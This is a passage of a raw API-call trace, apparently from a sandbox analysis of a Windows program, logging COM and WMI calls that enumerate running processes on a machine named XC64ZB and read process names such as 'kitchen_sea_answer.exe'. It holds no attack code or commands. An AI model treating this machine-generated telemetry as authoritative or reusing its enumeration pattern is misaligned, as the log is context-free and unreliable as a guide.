riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.681] WbemDefPath:IUnknown:Release (This=0x550e4e8) returned 0x3 [0264.682] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.682] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515308, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.682] WbemDefPath:IUnknown:Release (This=0x5515308) returned 0x2 [0264.682] WbemDefPath:IUnknown:Release (This=0x5515308) returned 0x1 [0264.682] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.682] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515308, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5515308) returned 0x0 [0264.682] WbemDefPath:IUnknown:AddRef (This=0x5515308) returned 0x3 [0264.682] WbemDefPath:IUnknown:Release (This=0x5515308) returned 0x2 [0264.682] WbemDefPath:IWbemPath:SetText (This=0x5515308, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2984\"") returned 0x0 [0264.682] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.682] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.682] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.682] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.682] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.682] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.683] IWbemClassObject:Get (in: This=0x5518440, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cef0c*=0, plFlavor=0x23cef10*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="kitchen_sea_answer.exe", varVal2=0x0), pType=0x23cef0c*=8, plFlavor=0x23cef10*=0) returned 0x0 [0264.683] SysStringByteLen (bstr="kitchen_sea_answer.exe") returned 0x2c [0264.683] SysStringByteLen (bstr="kitchen_sea_answer.exe") returned 0x2c [0264.683] IWbemClassObject:Get (in: This=0x5518440, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cef0c*=8, plFlavor=0x23cef10*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="kitchen_sea_answer.exe", varVal2=0x0), pType=0x23cef0c*=8, plFlavor=0x23cef10*=0) returned 0x0 [0264.683] SysStringByteLen (bstr="kitchen_sea_answer.exe") returned 0x2c [0264.683] SysStringByteLen (bstr="kitchen_sea_answer.exe") returned 0x2c [0264.683] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0264.683] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x5518dd0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.684] IUnknown:QueryInterface (in: This=0x5518dd0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5518dd0) returned 0x0 [0264.684] IUnknown:QueryInterface (in: This=0x5518dd0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.684] IUnknown:QueryInterface (in: This=0x5518dd0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.684] IUnknown:QueryInterface (in: This=0x5518dd0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.685] IUnknown:AddRef (This=0x5518dd0) returned 0x3 [0264.685] IUnknown:QueryInterface (in: This=0x5518dd0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.685] IUnknown:QueryInterface (in: This=0x5518dd0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.685] IUnknown:QueryInterface (in: This=0x5518dd0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5518dd4) returned 0x0 [0264.685] IMarshal:GetUnmarshalClass (in: This=0x5518dd4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.685] IUnknown:Release (This=0x5518dd4) returned 0x3 [0264.685] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.685] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.685] IUnknown:QueryInterface (in: This=0x5518dd0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.686] IUnknown:Release (This=0x5518dd0) returned 0x2 [0264.688] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.688] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.688] IUnknown:QueryInterface (in: This=0x5518dd0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5518dd0) returned 0x0 [0264.688] IUnknown:AddRef (This=0x5518dd0) returned 0x4 [0264.688] IUnknown:Release (This=0x5518dd0) returned 0x3 [0264.688] IUnknown:Release (This=0x5518dd0) returned 0x2 [0264.688] CoTaskMemFree (pv=0x54ba2c8) [0264.688] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.688] IUnknown:AddRef (This=0x5518dd0) returned 0x3 [0264.689] IWbemClassObject:Get (in: This=0x5518dd0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.689] IWbemClassObject:Get (in: This=0x5518dd0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3784\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.689] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3784\"") returned 0x5e [0264.689] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3784\"") returned 0x5e [0264.689] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.689] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.689] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.689] IUnknown:Release (This=0x601a94) returned 0x1 [0264.690] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0264.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.690] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x55147a8) returned 0x0 [0264.690] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0264.691] WbemDefPath:IUnknown:QueryInterface (in: This=0x55147a8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x55147a8) returned 0x0 [0264.691] WbemDefPath:IUnknown:QueryInterface (in: This=0x55147a8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.691] WbemDefPath:IUnknown:QueryInterface (in: This=0x55147a8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.691] WbemDefPath:IUnknown:AddRef (This=0x55147a8) returned 0x3 [0264.691] WbemDefPath:IUnknown:QueryInterface (in: This=0x55147a8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.691] WbemDefPath:IUnknown:QueryInterface (in: This=0x55147a8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.691] WbemDefPath:IUnknown:QueryInterface (in: This=0x55147a8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x550e530) returned 0x0 [0264.691] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x550e530, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.691] WbemDefPath:IUnknown:Release (This=0x550e530) returned 0x3 [0264.691] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.692] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.692] WbemDefPath:IUnknown:QueryInterface (in: This=0x55147a8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.692] WbemDefPath:IUnknown:Release (This=0x55147a8) returned 0x2 [0264.692] WbemDefPath:IUnknown:Release (This=0x55147a8) returned 0x1 [0264.692] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.692] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.692] WbemDefPath:IUnknown:QueryInterface (in: This=0x55147a8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x55147a8) returned 0x0 [0264.692] WbemDefPath:IUnknown:AddRef (This=0x55147a8) returned 0x3 [0264.692] WbemDefPath:IUnknown:Release (This=0x55147a8) returned 0x2 [0264.692] WbemDefPath:IWbemPath:SetText (This=0x55147a8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3784\"") returned 0x0 [0264.692] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.692] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.692] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.692] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.692] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.692] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.693] IWbemClassObject:Get (in: This=0x5518dd0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cf7c8*=0, plFlavor=0x23cf7cc*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="official.exe", varVal2=0x0), pType=0x23cf7c8*=8, plFlavor=0x23cf7cc*=0) returned 0x0 [0264.693] SysStringByteLen (bstr="official.exe") returned 0x18 [0264.693] SysStringByteLen (bstr="official.exe") returned 0x18 [0264.693] IWbemClassObject:Get (in: This=0x5518dd0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cf7c8*=8, plFlavor=0x23cf7cc*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="official.exe", varVal2=0x0), pType=0x23cf7c8*=8, plFlavor=0x23cf7cc*=0) returned 0x0 [0264.693] SysStringByteLen (bstr="official.exe") returned 0x18 [0264.693] SysStringByteLen (bstr="official.exe") returned 0x18 [0264.693] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0264.694] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x5518770, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.695] IUnknown:QueryInterface (in: This=0x5518770, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5518770) returned 0x0 [0264.695] IUnknown:QueryInterface (in: This=0x5518770, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.695] IUnknown:QueryInterface (in: This=0x5518770, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.695] IUnknown:QueryInterface (in: This=0x5518770, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.695] IUnknown:AddRef (This=0x5518770) returned 0x3 [0264.695] IUnknown:QueryInterface (in: This=0x5518770, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.695] IUnknown:QueryInterface (in: This=0x5518770, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.695] IUnknown:QueryInterface (in: This=0x5518770, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5518774) returned 0x0 [0264.695] IMarshal:GetUnmarshalClass (in: This=0x5518774, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.695] IUnknown:Release (This=0x5518774) returned 0x3 [0264.695] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.696] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.696] IUnknown:QueryInterface (in: This=0x5518770, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.696] IUnknown:Release (This=0x5518770) returned 0x2 [0264.696] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.696] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.696] IUnknown:QueryInterface (in: This=0x5518770, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5518770) returned 0x0 [0264.696] IUnknown:AddRef (This=0x5518770) returned 0x4 [0264.696] IUnknown:Release (This=0x5518770) returned 0x3 [0264.696] IUnknown:Release (This=0x5518770) returned 0x2 [0264.696] CoTaskMemFree (pv=0x54ba398) [0264.696] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.696] IUnknown:AddRef (This=0x5518770) returned 0x3 [0264.696] IWbemClassObject:Get (in: This=0x5518770, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.697] IWbemClassObject:Get (in: This=0x5518770, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3776\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.697] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3776\"") returned 0x5e [0264.697] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3776\"") returned 0x5e [0264.697] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.697] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.697] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.697] IUnknown:Release (This=0x601a94) returned 0x1 [0264.698] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0264.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.698] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, 